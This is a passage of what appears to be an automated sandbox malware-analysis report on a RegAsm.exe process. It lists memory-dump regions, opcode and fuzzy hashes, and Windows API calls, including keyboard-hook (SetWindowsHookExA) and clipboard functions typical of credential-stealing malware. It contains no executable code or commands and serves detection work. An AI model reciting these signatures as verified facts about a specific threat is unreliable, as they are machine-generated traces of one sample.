                                                  • Instruction ID: 6db89eeeda605772e79e64888267f51564dd83b913ea76f1ff268e4542161339
                                                  • Opcode Fuzzy Hash: 0926f06eceb84f193b2b5feeecd6552ce847500208f9989f7fa8cfe229cd7dc5
                                                  • Instruction Fuzzy Hash: 29617334F002089FEB549FA4C8147AEBBF6FF88300F24842AD506EB395DB758D458B91

                                                  Control-flow Graph
                                                  • Function 61e9140-61e9a7d (rendered graph with executed / not-executed colouring; edge list omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q
                                                  • API String ID: 0-3126353813
                                                  • Opcode ID: 3a800849f5ea1f16f13def6b6b8a9b58bddbc41e3eb360948594a9e90b3c0a70
                                                  • Instruction ID: 092938502919bbc5175f9f802c204e727448e4161c1073f90869e27c554efb7d
                                                  • Opcode Fuzzy Hash: 3a800849f5ea1f16f13def6b6b8a9b58bddbc41e3eb360948594a9e90b3c0a70
                                                  • Instruction Fuzzy Hash: A1515E30B006059FDB54DB79D861BAE7BF2BF89300F1088A9D809DB348EE70DD468B91

                                                  Control-flow Graph
                                                  • Function 61e4b50-61e52ab, calls 61e5409 (rendered graph with executed / not-executed colouring; edge list omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fq$XPq
                                                  • API String ID: 0-3167736908
                                                  • Opcode ID: 48420b33ce6fe54adbe5f0880116c319495ab9bfce9ab0d21bc6877779a9ded3
                                                  • Instruction ID: a7b9329e72c5b4703f30d66699a318cea527e97afacd909d6a912c64e0bf661b
                                                  • Opcode Fuzzy Hash: 48420b33ce6fe54adbe5f0880116c319495ab9bfce9ab0d21bc6877779a9ded3
                                                  • Instruction Fuzzy Hash: E9518834F002089FDB549FA5C815BAEBBF6FF88300F24852AE105AB395DB759C41CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3676670526.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_e50000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b7e32f6c9776468cf974630991d14891db0b5152b343cfe883addb2dfbc0eca
                                                  • Instruction ID: 198f3851d0068f8cc291f65c72ad7eaa2ad63adb886b8200ae99a71f254b4a18
                                                  • Opcode Fuzzy Hash: 0b7e32f6c9776468cf974630991d14891db0b5152b343cfe883addb2dfbc0eca
                                                  • Instruction Fuzzy Hash: 05512472D043958FCB14CFB5E8042EEBBF1AF85211F08896BD809E7741EB349949CBA1
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 061D26AA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 14723c466486ca320355466a386c8bd7830a75f0bd90783410311260d10cafb7
                                                  • Instruction ID: 26ca1e0fa324053d26a999da16e8ebbfe5c0bfaf937cfa116aa4374f63fb8395
                                                  • Opcode Fuzzy Hash: 14723c466486ca320355466a386c8bd7830a75f0bd90783410311260d10cafb7
                                                  • Instruction Fuzzy Hash: 965101B1C00249AFDF55CFA9D980ADDBFB1FF48310F25812AE919AB224D771AA45CF50
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 061D26AA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: b3d1cdb4b49db714e7c5b1f4734499555e0058e507ded40eb4b63e7e6fde6d0f
                                                  • Instruction ID: 18d9f4034a538a421b3c09aa89954431940f542e0201ba4817a8c4c8294fe0ac
                                                  • Opcode Fuzzy Hash: b3d1cdb4b49db714e7c5b1f4734499555e0058e507ded40eb4b63e7e6fde6d0f
                                                  • Instruction Fuzzy Hash: 4941CEB1D00348DFDB14CF9AC984ADEBBF5BF48310F24812AE819AB210D775A985CF94
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 061D73D1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 7e5cd5aa85d96e0fa4ef4d058a382f0442489b62ceed3908c5f6f82bf23086eb
                                                  • Instruction ID: 6f56f50acba86460d337b0521a9237274b1fa72a87e41426c2828b29c2f1d1b8
                                                  • Opcode Fuzzy Hash: 7e5cd5aa85d96e0fa4ef4d058a382f0442489b62ceed3908c5f6f82bf23086eb
                                                  • Instruction Fuzzy Hash: B2412AB9900345DFDB54CF99C448BAABBF5FF88314F148859D919AB361D374A841CBA0
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 061D9C2B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: 78bc00aec8d79a46e15e84cbedfbfdbf88f1f09a08e5f885d677facc1f1988d5
                                                  • Instruction ID: 0c1294f961deb8450d3b1959099c4cc2066555ce9f5f10b854376463b9434951
                                                  • Opcode Fuzzy Hash: 78bc00aec8d79a46e15e84cbedfbfdbf88f1f09a08e5f885d677facc1f1988d5
                                                  • Instruction Fuzzy Hash: D721B172A003459FCB15EF69D941B9EBBF1FF84310F10886DE469AB391CB35A905CBA1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Clipboard
                                                  • String ID:
                                                  • API String ID: 220874293-0
                                                  • Opcode ID: 430c4ad15b573215b25e50813a11078201398f3b1091abe41e2a634e16c5f192
                                                  • Instruction ID: 623d56464aaf397cf3fb10eac4b50de04f44a1e03dbbc0841aa4f0fa211dbadb
                                                  • Opcode Fuzzy Hash: 430c4ad15b573215b25e50813a11078201398f3b1091abe41e2a634e16c5f192
                                                  • Instruction Fuzzy Hash: D531E3B0D01248DFDB64CF99C984BDDBBF5BB48308F248459E404BB390D775A949CB65
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Clipboard
                                                  • String ID:
                                                  • API String ID: 220874293-0
                                                  • Opcode ID: 133eb837696294c0b23ff5e4a2ea333a9c9bd4dbd3540130a50e0abf0ca0e6e2
                                                  • Instruction ID: 0240fb77d717c1a26d1ea421cca446bed15ebcd30803a95aea281d43a8a29392
                                                  • Opcode Fuzzy Hash: 133eb837696294c0b23ff5e4a2ea333a9c9bd4dbd3540130a50e0abf0ca0e6e2
                                                  • Instruction Fuzzy Hash: F93102B4D01348DFEB64CF99C984B9EBBF4BB48304F248459E404AB390D7B4A849CBA5
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 061D64FF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 149d9d3df8e3309b94613791468fadf71c655a9c1f5ac153ec9eafd60be97085
                                                  • Instruction ID: 58b22ba73c6ce7a5326499f9003edb58b2ea4845386c205a5061794717188dcd
                                                  • Opcode Fuzzy Hash: 149d9d3df8e3309b94613791468fadf71c655a9c1f5ac153ec9eafd60be97085
                                                  • Instruction Fuzzy Hash: 5321E6B5D002489FDB10CFAAD984ADEFFF4EB48314F14841AE955A3311D374A944CFA5
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 061D64FF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 7695ca047260a3c1995b3f28847831097d6a4dca5effe4dcb7614512da17f02c
                                                  • Instruction ID: 1acb5791d86f303dead96acce2683c8588edc41cbb2e5a9ed7c389a17cb60166
                                                  • Opcode Fuzzy Hash: 7695ca047260a3c1995b3f28847831097d6a4dca5effe4dcb7614512da17f02c
                                                  • Instruction Fuzzy Hash: E121E2B5D002489FDB10CFAAD984ADEFBF4EB48324F14841AE918A3310D378A944CFA5
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 061D9C2B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: fdf6b1187b253e432756cd2ff8af6ab77961803274d56bc75261787cd6f53576
                                                  • Instruction ID: 4f42ed273ac7d35476800fabb5fc7ffaf49a7de9aba3ea8ae0d377becf41b528
                                                  • Opcode Fuzzy Hash: fdf6b1187b253e432756cd2ff8af6ab77961803274d56bc75261787cd6f53576
                                                  • Instruction Fuzzy Hash: AB2113B5D002099FDB14CFAAD944BEEFBF4AB88310F14882AE419A7250C774A944CFA5
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 061D9C2B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: 96ed44ab9dbf2cbe80816085859b524e613de87282f2b394e53e1e1fe7c5fafe
                                                  • Instruction ID: 73f867001cffd8ec268c5e852db3d0372ce37dba38d95a285b3f53133e87091e
                                                  • Opcode Fuzzy Hash: 96ed44ab9dbf2cbe80816085859b524e613de87282f2b394e53e1e1fe7c5fafe
                                                  • Instruction Fuzzy Hash: 642136B5D002088FDB14CF9AD944BEEFBF4FB88310F14882AE419A7250C774A944CFA5
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00E5EAF7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3676670526.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_e50000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 83cfcba57f6ec9c14b2369ed3344277b2a2ba7ca064cbe2b8bff31d09f4759c3
                                                  • Instruction ID: 1ab6a1fb5cc0c02c111042ccd597526fc1a9c73ed242b241994ac71e83080de9
                                                  • Opcode Fuzzy Hash: 83cfcba57f6ec9c14b2369ed3344277b2a2ba7ca064cbe2b8bff31d09f4759c3
                                                  • Instruction Fuzzy Hash: 8E1114B6C006599FDB14CF9AD444BDEFBF4AB48324F14852AE818B7340D378A944CFA5
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 061D7F75
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: f59bdc71a9d78cc54196a26f4838e1db7c82a4e2aff7caf9f2297ef5a0f99675
                                                  • Instruction ID: 3d87db0ed5d9af9d1cffaf3040d3be1e74d0642206d0ee5f07aadd57d98c6594
                                                  • Opcode Fuzzy Hash: f59bdc71a9d78cc54196a26f4838e1db7c82a4e2aff7caf9f2297ef5a0f99675
                                                  • Instruction Fuzzy Hash: 071155B58043888FDB20CFAAD844B9EBFF4EB08224F14845AE458A7351C378A544CBA9
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 061D1556
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 16372cd6a0e0493664fff85e94157173f23ee492d3f402f781435e4a4748af6b
                                                  • Instruction ID: ba5e233aecbe28b222cd6109c6f6172c74fadd982cbc861c7e0e0e4e4effabfe
                                                  • Opcode Fuzzy Hash: 16372cd6a0e0493664fff85e94157173f23ee492d3f402f781435e4a4748af6b
                                                  • Instruction Fuzzy Hash: 571132B6C002489FDB24CF9AD844ACEFBF4EB49210F10841AD41AB7210C378A545CFA1
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 061D1556
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f9e161de6123753fbc8e33b2759ab3f1c3a753c90ca20b41ac4d6959e60f1e72
                                                  • Instruction ID: e0593b23cd2cb30193c506cdd5485544f0d9ae1feb031f49ef53ec691ca9b8ba
                                                  • Opcode Fuzzy Hash: f9e161de6123753fbc8e33b2759ab3f1c3a753c90ca20b41ac4d6959e60f1e72
                                                  • Instruction Fuzzy Hash: A51113B6C002498FDB10CF9AD844BDEFBF4EB49214F14841AD419B7210C379A545CFA5
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 061D7F75
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 5d9eb58b80f5210776d2abb9eb29c734ca32c061310455c7fa8fd55e1bc0f02f
                                                  • Instruction ID: 6d1f2d2d5ef844cdec263fc181d0f206da8e4b956dade3a66de45ef348a93acc
                                                  • Opcode Fuzzy Hash: 5d9eb58b80f5210776d2abb9eb29c734ca32c061310455c7fa8fd55e1bc0f02f
                                                  • Instruction Fuzzy Hash: 9A1112B5C047488FDB20DF9AD944BDEFBF4EB48224F24841AE519A7750C378A944CFA9
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,061D7625), ref: 061D76AF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 8c7bff4c0610bd49ad4dd900db3c5d8aa9c4c8a31e46291a2ae344f0d2645402
                                                  • Instruction ID: 5e0f56f9ea183ed0010a7a4d837acde7cdb2d9ab86d9700d8dea8348ed7bda92
                                                  • Opcode Fuzzy Hash: 8c7bff4c0610bd49ad4dd900db3c5d8aa9c4c8a31e46291a2ae344f0d2645402
                                                  • Instruction Fuzzy Hash: 3211F5B5C002898FDB60DF9AD944B9EFBF4EB48314F20841AE519A7350D374A944CBA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,061D7625), ref: 061D76AF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: e57efc6d51e59492a521d293e62e64d34467398bee8d100ecf28db43296cedcd
                                                  • Instruction ID: 7d0345297c17a8aa32036ca99110f1db38a12b0a620fbac6e396e5e2fc18b7c7
                                                  • Opcode Fuzzy Hash: e57efc6d51e59492a521d293e62e64d34467398bee8d100ecf28db43296cedcd
                                                  • Instruction Fuzzy Hash: CC1115B5C002488FDB20DF9AD944BDEFBF4EB48324F24841AE519A7750D374A544CFA5
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 061D7F75
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680111363.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61d0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: c179578ce9ebad14b64262f02f4484fa16bbf54a1674d7aabea53a71e3a7e5a4
                                                  • Instruction ID: 0a1269f0fcd75030ac302313b9fd168db21830d40a67ff8382e46628f6cd69b0
                                                  • Opcode Fuzzy Hash: c179578ce9ebad14b64262f02f4484fa16bbf54a1674d7aabea53a71e3a7e5a4
                                                  • Instruction Fuzzy Hash: F31115B5C003488FDB20CFAAD945BDEFBF4EB48224F148419E559A7350C778A544CFA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHq
                                                  • API String ID: 0-3820536768
                                                  • Opcode ID: 9fbaf2e036eb19d4946722d69114171b2862c3fb9463e3d4afda777bac584430
                                                  • Instruction ID: 9aa3a67dfe4ccd154b9e079e095940fd8a918224165342ad059d128bdbea0f16
                                                  • Opcode Fuzzy Hash: 9fbaf2e036eb19d4946722d69114171b2862c3fb9463e3d4afda777bac584430
                                                  • Instruction Fuzzy Hash: AD416074E00B099FDB64DF65D8546AEBBB2BF86740F20852AD406EB340EB70D946CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHq
                                                  • API String ID: 0-3820536768
                                                  • Opcode ID: 5e96c4b9631d6bcc4ea7ca169d8cd44445ed4dc369d8ddce6fa8074fef825340
                                                  • Instruction ID: 688aee12b965774811c67958be568fc32aebaaf038c88971eec53832790fc926
                                                  • Opcode Fuzzy Hash: 5e96c4b9631d6bcc4ea7ca169d8cd44445ed4dc369d8ddce6fa8074fef825340
                                                  • Instruction Fuzzy Hash: 3531D030B006068FDB59AF74C86076E7BE7AB89310F2485A9D406DB395DF35CE02CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHq
                                                  • API String ID: 0-3820536768
                                                  • Opcode ID: 9ce5f8c5f6c1c20ce676b16801b727e245ef8780c25f9ee2651a22677f789b67
                                                  • Instruction ID: 0d122e4110107171a118fd41a061d95b0c0cebce40e074063111837050f65ea0
                                                  • Opcode Fuzzy Hash: 9ce5f8c5f6c1c20ce676b16801b727e245ef8780c25f9ee2651a22677f789b67
                                                  • Instruction Fuzzy Hash: C631FE30B006068FDB58AB78C86476E7BE7BF89600B248469D406DB395DF35DE02CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4471e7f8085ca187ed127a1cf37b42cdd51ce1b0494d96fa729fcd2983ccf0c6
                                                  • Instruction ID: e35d37e1be7ad9fb960201be723cb82186a470df58b48206e25b701baef7c5f1
                                                  • Opcode Fuzzy Hash: 4471e7f8085ca187ed127a1cf37b42cdd51ce1b0494d96fa729fcd2983ccf0c6
                                                  • Instruction Fuzzy Hash: B561C171F005214BDF509A7DC88069EBAD7AFE4620B594439D80AEB364DFB5EC4287D2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5964897501e4eb4b474c9177bde82c391031af7aa5a0923063fb299eaeb8f311
                                                  • Instruction ID: 2ff462404f408e8d5dc8169433cfc037669897780c16e111620815917c37915f
                                                  • Opcode Fuzzy Hash: 5964897501e4eb4b474c9177bde82c391031af7aa5a0923063fb299eaeb8f311
                                                  • Instruction Fuzzy Hash: C7812E34B006059FDB54DFB9D4907AEBBE2AF89300F148569E41AEB358EB74DC428791
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 55e31563ed1cb47ad470801d2d810e0b168d2872a107595b3605fc84aa9f4036
                                                  • Instruction ID: f384cb1d96601388c728df798d50644eeadbefbe79ff0d7bc3cd5241ee0103f3
                                                  • Opcode Fuzzy Hash: 55e31563ed1cb47ad470801d2d810e0b168d2872a107595b3605fc84aa9f4036
                                                  • Instruction Fuzzy Hash: 55914C34E106198BDF60CF68C890B9DB7B1FF89310F208699D549AB385DB70AA85CB91
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9a60e7ac72af3bca2ccbce09a463dd7733e0bece042693abf61c5473fe6fcca
                                                  • Instruction ID: c83d8bf790d69542ed1e5c319094eb25b5cb8939a28e4e8d054978176f8e365b
                                                  • Opcode Fuzzy Hash: f9a60e7ac72af3bca2ccbce09a463dd7733e0bece042693abf61c5473fe6fcca
                                                  • Instruction Fuzzy Hash: C8911C34E106198BDF60DF68C890B9DB7B1FF89310F208699D549AB385DB70AA85CF91
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e46170f6eb65d9d49157ced84f0a0caa2a80ba3c911dec192e4c34d8ccdc8ccb
                                                  • Instruction ID: 2c5a48bad5bf234d422e38d8aa2f74320b33ebda57da6a86460484607fde5761
                                                  • Opcode Fuzzy Hash: e46170f6eb65d9d49157ced84f0a0caa2a80ba3c911dec192e4c34d8ccdc8ccb
                                                  • Instruction Fuzzy Hash: 40714734E006099FDB54DFA8D980AADBBF6FF88310F248569E416EB355DB30E946CB50
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 165149727e83c78b38cb86a68d6fc74f1dc25d69e40a7ceb036229b3f6eaa915
                                                  • Instruction ID: 0b05d498564d127a9b3becb85123e6d3bdd0921b67d448a36fed693fbaee9880
                                                  • Opcode Fuzzy Hash: 165149727e83c78b38cb86a68d6fc74f1dc25d69e40a7ceb036229b3f6eaa915
                                                  • Instruction Fuzzy Hash: CC713834E006099FDB54DBA9D980AAEBBF6FF88310F248469E405EB355DB30ED46CB51
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8f0f98cd437c309c8089cbe8ef11039f3a09f63292431db66eef329fcdc5f05
                                                  • Instruction ID: 5cbbd3deb3dde6a374883b0635f6bc99a02b434595bb963c68e830aea796b86b
                                                  • Opcode Fuzzy Hash: f8f0f98cd437c309c8089cbe8ef11039f3a09f63292431db66eef329fcdc5f05
                                                  • Instruction Fuzzy Hash: E251D035E00608DFDF64AFB8E4586ADBBB2FF84311F208869E906D7250DB35D946C780
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e435fd49a9a66296e31deccd631e0870966fb28261a3f4974b52121a9258b59f
                                                  • Instruction ID: 21b7ba7a196853ee17e98b1d1a8adfef5eeb0422591b472a4c804919abdea021
                                                  • Opcode Fuzzy Hash: e435fd49a9a66296e31deccd631e0870966fb28261a3f4974b52121a9258b59f
                                                  • Instruction Fuzzy Hash: ED51C630F10705DFEF645A68D854B6F269AD789710F20446AE40BDB3A9CB6CCC4783A2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
